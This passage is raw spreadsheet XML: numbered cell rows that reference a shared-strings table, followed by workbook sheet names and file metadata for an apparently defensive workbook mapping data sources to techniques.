      </c>
      <c r="E193" s="6" t="s">
        <v>1105</v>
      </c>
      <c r="F193" s="6" t="s">
        <v>1106</v>
      </c>
      <c r="G193" s="6" t="s">
        <v>1093</v>
      </c>
    </row>
    <row r="194" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A194" s="6" t="s">
        <v>254</v>
      </c>
      <c r="B194" s="6" t="s">
        <v>1107</v>
      </c>
      <c r="C194" s="6" t="s">
        <v>1108</v>
      </c>
      <c r="D194" s="6" t="s">
        <v>1104</v>
      </c>
      <c r="E194" s="6" t="s">
        <v>1109</v>
      </c>
      <c r="F194" s="6" t="s">
        <v>1110</v>
      </c>
      <c r="G194" s="6" t="s">
        <v>1093</v>
      </c>
    </row>
    <row r="195" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A195" s="6" t="s">
        <v>255</v>
      </c>
      <c r="B195" s="6" t="s">
        <v>1111</v>
      </c>
      <c r="C195" s="6" t="s">
        <v>1112</v>
      </c>
      <c r="D195" s="6" t="s">
        <v>1104</v>
      </c>
      <c r="E195" s="6" t="s">
        <v>1113</v>
      </c>
      <c r="F195" s="6" t="s">
        <v>1114</v>
      </c>
      <c r="G195" s="6" t="s">
        <v>1093</v>
      </c>
    </row>
    <row r="196" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A196" s="6" t="s">
        <v>256</v>
      </c>
      <c r="B196" s="6" t="s">
        <v>1115</v>
      </c>
      <c r="C196" s="6" t="s">
        <v>1116</v>
      </c>
      <c r="D196" s="6" t="s">
        <v>392</v>
      </c>
      <c r="E196" s="6" t="s">
        <v>1117</v>
      </c>
      <c r="F196" s="6" t="s">
        <v>1118</v>
      </c>
      <c r="G196" s="6" t="s">
        <v>1093</v>
      </c>
    </row>
    <row r="197" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A197" s="6" t="s">
        <v>257</v>
      </c>
      <c r="B197" s="6" t="s">
        <v>1119</v>
      </c>
      <c r="C197" s="6" t="s">
        <v>1120</v>
      </c>
      <c r="D197" s="6" t="s">
        <v>404</v>
      </c>
      <c r="E197" s="6" t="s">
        <v>1121</v>
      </c>
      <c r="F197" s="6" t="s">
        <v>1122</v>
      </c>
      <c r="G197" s="6" t="s">
        <v>635</v>
      </c>
    </row>
    <row r="198" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A198" s="6" t="s">
        <v>258</v>
      </c>
      <c r="B198" s="6" t="s">
        <v>1123</v>
      </c>
      <c r="C198" s="6" t="s">
        <v>1124</v>
      </c>
      <c r="D198" s="6" t="s">
        <v>404</v>
      </c>
      <c r="E198" s="6" t="s">
        <v>1125</v>
      </c>
      <c r="F198" s="6" t="s">
        <v>1126</v>
      </c>
      <c r="G198" s="6" t="s">
        <v>799</v>
      </c>
    </row>
    <row r="199" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A199" s="6" t="s">
        <v>259</v>
      </c>
      <c r="B199" s="6" t="s">
        <v>1127</v>
      </c>
      <c r="C199" s="6" t="s">
        <v>1128</v>
      </c>
      <c r="D199" s="6" t="s">
        <v>404</v>
      </c>
      <c r="E199" s="6" t="s">
        <v>1129</v>
      </c>
      <c r="F199" s="6" t="s">
        <v>1130</v>
      </c>
      <c r="G199" s="6" t="s">
        <v>799</v>
      </c>
    </row>
    <row r="200" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A200" s="6" t="s">
        <v>260</v>
      </c>
      <c r="B200" s="6" t="s">
        <v>1131</v>
      </c>
      <c r="C200" s="6" t="s">
        <v>1132</v>
      </c>
      <c r="D200" s="6" t="s">
        <v>392</v>
      </c>
      <c r="E200" s="6" t="s">
        <v>1133</v>
      </c>
      <c r="F200" s="6" t="s">
        <v>1134</v>
      </c>
      <c r="G200" s="6" t="s">
        <v>1093</v>
      </c>
    </row>
    <row r="201" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A201" s="6" t="s">
        <v>261</v>
      </c>
      <c r="B201" s="6" t="s">
        <v>1135</v>
      </c>
      <c r="C201" s="6" t="s">
        <v>1136</v>
      </c>
      <c r="D201" s="6" t="s">
        <v>398</v>
      </c>
      <c r="E201" s="6" t="s">
        <v>1137</v>
      </c>
      <c r="F201" s="6" t="s">
        <v>1138</v>
      </c>
      <c r="G201" s="6" t="s">
        <v>1093</v>
      </c>
    </row>
    <row r="202" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A202" s="6" t="s">
        <v>262</v>
      </c>
      <c r="B202" s="6" t="s">
        <v>1139</v>
      </c>
      <c r="C202" s="6" t="s">
        <v>1140</v>
      </c>
      <c r="D202" s="6" t="s">
        <v>398</v>
      </c>
      <c r="E202" s="6" t="s">
        <v>1141</v>
      </c>
      <c r="F202" s="6" t="s">
        <v>1142</v>
      </c>
      <c r="G202" s="6" t="s">
        <v>421</v>
      </c>
    </row>
    <row r="203" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A203" s="6" t="s">
        <v>263</v>
      </c>
      <c r="B203" s="6" t="s">
        <v>1143</v>
      </c>
      <c r="C203" s="6" t="s">
        <v>1144</v>
      </c>
      <c r="D203" s="6" t="s">
        <v>404</v>
      </c>
      <c r="E203" s="6" t="s">
        <v>1145</v>
      </c>
      <c r="F203" s="6" t="s">
        <v>1146</v>
      </c>
      <c r="G203" s="6" t="s">
        <v>416</v>
      </c>
    </row>
    <row r="204" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A204" s="6" t="s">
        <v>264</v>
      </c>
      <c r="B204" s="6" t="s">
        <v>1147</v>
      </c>
      <c r="C204" s="6" t="s">
        <v>1148</v>
      </c>
      <c r="D204" s="6" t="s">
        <v>392</v>
      </c>
      <c r="E204" s="6" t="s">
        <v>1149</v>
      </c>
      <c r="F204" s="6" t="s">
        <v>1150</v>
      </c>
      <c r="G204" s="6" t="s">
        <v>528</v>
      </c>
    </row>
    <row r="205" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A205" s="6" t="s">
        <v>265</v>
      </c>
      <c r="B205" s="6" t="s">
        <v>1151</v>
      </c>
      <c r="C205" s="6" t="s">
        <v>1152</v>
      </c>
      <c r="D205" s="6" t="s">
        <v>392</v>
      </c>
      <c r="E205" s="6" t="s">
        <v>1153</v>
      </c>
      <c r="F205" s="6" t="s">
        <v>1154</v>
      </c>
      <c r="G205" s="6" t="s">
        <v>528</v>
      </c>
    </row>
    <row r="206" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A206" s="6" t="s">
        <v>266</v>
      </c>
      <c r="B206" s="6" t="s">
        <v>1155</v>
      </c>
      <c r="C206" s="6" t="s">
        <v>841</v>
      </c>
      <c r="D206" s="6" t="s">
        <v>910</v>
      </c>
      <c r="E206" s="6" t="s">
        <v>1156</v>
      </c>
      <c r="F206" s="6" t="s">
        <v>1157</v>
      </c>
      <c r="G206" s="6" t="s">
        <v>1158</v>
      </c>
    </row>
    <row r="207" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A207" s="6" t="s">
        <v>267</v>
      </c>
      <c r="B207" s="6" t="s">
        <v>1159</v>
      </c>
      <c r="C207" s="6" t="s">
        <v>696</v>
      </c>
      <c r="D207" s="6" t="s">
        <v>910</v>
      </c>
      <c r="E207" s="6" t="s">
        <v>1160</v>
      </c>
      <c r="F207" s="6" t="s">
        <v>1161</v>
      </c>
      <c r="G207" s="6" t="s">
        <v>651</v>
      </c>
    </row>
    <row r="208" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A208" s="6" t="s">
        <v>268</v>
      </c>
      <c r="B208" s="6" t="s">
        <v>1162</v>
      </c>
      <c r="C208" s="6" t="s">
        <v>1163</v>
      </c>
      <c r="D208" s="6" t="s">
        <v>404</v>
      </c>
      <c r="E208" s="6" t="s">
        <v>1164</v>
      </c>
      <c r="F208" s="6" t="s">
        <v>1165</v>
      </c>
      <c r="G208" s="6" t="s">
        <v>416</v>
      </c>
    </row>
    <row r="209" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A209" s="6" t="s">
        <v>269</v>
      </c>
      <c r="B209" s="6" t="s">
        <v>1166</v>
      </c>
      <c r="C209" s="6" t="s">
        <v>367</v>
      </c>
      <c r="D209" s="6" t="s">
        <v>404</v>
      </c>
      <c r="E209" s="6" t="s">
        <v>1167</v>
      </c>
      <c r="F209" s="6" t="s">
        <v>1168</v>
      </c>
      <c r="G209" s="6" t="s">
        <v>401</v>
      </c>
    </row>
    <row r="210" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A210" s="6" t="s">
        <v>270</v>
      </c>
      <c r="B210" s="6" t="s">
        <v>1169</v>
      </c>
      <c r="C210" s="6" t="s">
        <v>1170</v>
      </c>
      <c r="D210" s="6" t="s">
        <v>404</v>
      </c>
      <c r="E210" s="6" t="s">
        <v>1171</v>
      </c>
      <c r="F210" s="6" t="s">
        <v>1172</v>
      </c>
      <c r="G210" s="6" t="s">
        <v>407</v>
      </c>
    </row>
    <row r="211" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A211" s="6" t="s">
        <v>271</v>
      </c>
      <c r="B211" s="6" t="s">
        <v>1173</v>
      </c>
      <c r="C211" s="6" t="s">
        <v>1174</v>
      </c>
      <c r="D211" s="6" t="s">
        <v>392</v>
      </c>
      <c r="E211" s="6" t="s">
        <v>1175</v>
      </c>
      <c r="F211" s="6" t="s">
        <v>1176</v>
      </c>
      <c r="G211" s="6" t="s">
        <v>461</v>
      </c>
    </row>
    <row r="212" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A212" s="6" t="s">
        <v>272</v>
      </c>
      <c r="B212" s="6" t="s">
        <v>1177</v>
      </c>
      <c r="C212" s="6" t="s">
        <v>1174</v>
      </c>
      <c r="D212" s="6" t="s">
        <v>392</v>
      </c>
      <c r="E212" s="6" t="s">
        <v>1178</v>
      </c>
      <c r="F212" s="6" t="s">
        <v>1179</v>
      </c>
      <c r="G212" s="6" t="s">
        <v>416</v>
      </c>
    </row>
    <row r="213" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A213" s="6" t="s">
        <v>273</v>
      </c>
      <c r="B213" s="6" t="s">
        <v>1180</v>
      </c>
      <c r="C213" s="6" t="s">
        <v>1181</v>
      </c>
      <c r="D213" s="6" t="s">
        <v>392</v>
      </c>
      <c r="E213" s="6" t="s">
        <v>1182</v>
      </c>
      <c r="F213" s="6" t="s">
        <v>1183</v>
      </c>
      <c r="G213" s="6" t="s">
        <v>401</v>
      </c>
    </row>
    <row r="214" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A214" s="6" t="s">
        <v>274</v>
      </c>
      <c r="B214" s="6" t="s">
        <v>1184</v>
      </c>
      <c r="C214" s="6" t="s">
        <v>1185</v>
      </c>
      <c r="D214" s="6" t="s">
        <v>392</v>
      </c>
      <c r="E214" s="6" t="s">
        <v>1186</v>
      </c>
      <c r="F214" s="6" t="s">
        <v>1187</v>
      </c>
      <c r="G214" s="6" t="s">
        <v>412</v>
      </c>
    </row>
    <row r="215" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A215" s="6" t="s">
        <v>275</v>
      </c>
      <c r="B215" s="6" t="s">
        <v>1188</v>
      </c>
      <c r="C215" s="6" t="s">
        <v>1189</v>
      </c>
      <c r="D215" s="6" t="s">
        <v>404</v>
      </c>
      <c r="E215" s="6" t="s">
        <v>1190</v>
      </c>
      <c r="F215" s="6" t="s">
        <v>1191</v>
      </c>
      <c r="G215" s="6" t="s">
        <v>401</v>
      </c>
    </row>
    <row r="216" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A216" s="6" t="s">
        <v>276</v>
      </c>
      <c r="B216" s="6" t="s">
        <v>1192</v>
      </c>
      <c r="C216" s="6" t="s">
        <v>1193</v>
      </c>
      <c r="D216" s="6" t="s">
        <v>910</v>
      </c>
      <c r="E216" s="6" t="s">
        <v>1194</v>
      </c>
      <c r="F216" s="6" t="s">
        <v>1195</v>
      </c>
      <c r="G216" s="6" t="s">
        <v>407</v>
      </c>
    </row>
    <row r="217" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A217" s="6" t="s">
        <v>277</v>
      </c>
      <c r="B217" s="6" t="s">
        <v>1196</v>
      </c>
      <c r="C217" s="6" t="s">
        <v>418</v>
      </c>
      <c r="D217" s="6" t="s">
        <v>404</v>
      </c>
      <c r="E217" s="6" t="s">
        <v>1197</v>
      </c>
      <c r="F217" s="6" t="s">
        <v>1198</v>
      </c>
      <c r="G217" s="6" t="s">
        <v>635</v>
      </c>
    </row>
    <row r="218" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A218" s="6" t="s">
        <v>278</v>
      </c>
      <c r="B218" s="6" t="s">
        <v>1199</v>
      </c>
      <c r="C218" s="6" t="s">
        <v>1200</v>
      </c>
      <c r="D218" s="6" t="s">
        <v>392</v>
      </c>
      <c r="E218" s="6" t="s">
        <v>1201</v>
      </c>
      <c r="F218" s="6" t="s">
        <v>1202</v>
      </c>
      <c r="G218" s="6" t="s">
        <v>421</v>
      </c>
    </row>
    <row r="219" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A219" s="6" t="s">
        <v>279</v>
      </c>
      <c r="B219" s="6" t="s">
        <v>1203</v>
      </c>
      <c r="C219" s="6" t="s">
        <v>418</v>
      </c>
      <c r="D219" s="6" t="s">
        <v>404</v>
      </c>
      <c r="E219" s="6" t="s">
        <v>1204</v>
      </c>
      <c r="F219" s="6" t="s">
        <v>1205</v>
      </c>
      <c r="G219" s="6" t="s">
        <v>635</v>
      </c>
    </row>
    <row r="220" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A220" s="6" t="s">
        <v>280</v>
      </c>
      <c r="B220" s="6" t="s">
        <v>1206</v>
      </c>
      <c r="C220" s="6" t="s">
        <v>1207</v>
      </c>
      <c r="D220" s="6" t="s">
        <v>392</v>
      </c>
      <c r="E220" s="6" t="s">
        <v>1208</v>
      </c>
      <c r="F220" s="6" t="s">
        <v>1209</v>
      </c>
      <c r="G220" s="6" t="s">
        <v>389</v>
      </c>
    </row>
    <row r="221" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A221" s="6" t="s">
        <v>281</v>
      </c>
      <c r="B221" s="6" t="s">
        <v>1210</v>
      </c>
      <c r="C221" s="6" t="s">
        <v>1211</v>
      </c>
      <c r="D221" s="6" t="s">
        <v>404</v>
      </c>
      <c r="E221" s="6" t="s">
        <v>1212</v>
      </c>
      <c r="F221" s="6" t="s">
        <v>1213</v>
      </c>
      <c r="G221" s="6" t="s">
        <v>635</v>
      </c>
    </row>
    <row r="222" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A222" s="6" t="s">
        <v>282</v>
      </c>
      <c r="B222" s="6" t="s">
        <v>1214</v>
      </c>
      <c r="C222" s="6" t="s">
        <v>1215</v>
      </c>
      <c r="D222" s="6" t="s">
        <v>404</v>
      </c>
      <c r="E222" s="6" t="s">
        <v>1216</v>
      </c>
      <c r="F222" s="6" t="s">
        <v>1217</v>
      </c>
      <c r="G222" s="6" t="s">
        <v>416</v>
      </c>
    </row>
    <row r="223" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A223" s="6" t="s">
        <v>283</v>
      </c>
      <c r="B223" s="6" t="s">
        <v>1218</v>
      </c>
      <c r="C223" s="6" t="s">
        <v>590</v>
      </c>
      <c r="D223" s="6" t="s">
        <v>392</v>
      </c>
      <c r="E223" s="6" t="s">
        <v>1219</v>
      </c>
      <c r="F223" s="6" t="s">
        <v>1220</v>
      </c>
      <c r="G223" s="6" t="s">
        <v>416</v>
      </c>
    </row>
    <row r="224" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A224" s="6" t="s">
        <v>284</v>
      </c>
      <c r="B224" s="6" t="s">
        <v>1221</v>
      </c>
      <c r="C224" s="6" t="s">
        <v>409</v>
      </c>
      <c r="D224" s="6" t="s">
        <v>404</v>
      </c>
      <c r="E224" s="6" t="s">
        <v>1222</v>
      </c>
      <c r="F224" s="6" t="s">
        <v>1223</v>
      </c>
      <c r="G224" s="6" t="s">
        <v>635</v>
      </c>
    </row>
    <row r="225" spans="3:3" x14ac:dyDescent="0.25">
      <c r="C225" s="6" t="s">
        <v>1224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DataSourceEvents</vt:lpstr>
      <vt:lpstr>TechniqueDataSourceWeights</vt:lpstr>
      <vt:lpstr>RatingLegend</vt:lpstr>
      <vt:lpstr>KnowledgeBase</vt:lpstr>
      <vt:lpstr>REF-DataSources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Hartong, Olaf (NL - Amsterdam)</dc:creator>
  <cp:lastModifiedBy>Hartong, Olaf</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-27T13:18:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-06T20:43:09Z</dcterms:modified>
</cp:coreProperties>
</file>